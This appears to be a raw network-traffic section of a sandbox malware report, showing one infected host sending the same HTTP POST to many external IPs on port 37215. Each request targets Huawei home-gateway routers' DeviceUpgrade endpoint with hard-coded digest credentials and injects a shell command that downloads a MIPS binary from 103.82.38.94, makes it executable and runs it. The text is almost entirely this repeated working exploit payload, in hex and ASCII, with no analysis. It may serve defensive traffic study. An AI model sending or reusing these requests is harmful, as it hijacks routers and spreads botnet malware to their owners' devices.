                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26192.168.2.1460334197.115.185.23237215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091458082 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27192.168.2.143664641.98.170.19637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091479063 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28192.168.2.1447784156.253.22.17237215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091502905 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29192.168.2.145073441.179.176.6537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091555119 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30192.168.2.1460740197.241.131.12037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091562986 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31192.168.2.1434148197.253.168.14737215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091597080 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32192.168.2.1440264156.73.77.8837215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091620922 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33192.168.2.1442580197.198.156.24337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091644049 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34192.168.2.144834441.3.135.9737215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091681957 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35192.168.2.1449782197.174.148.18537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091696024 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 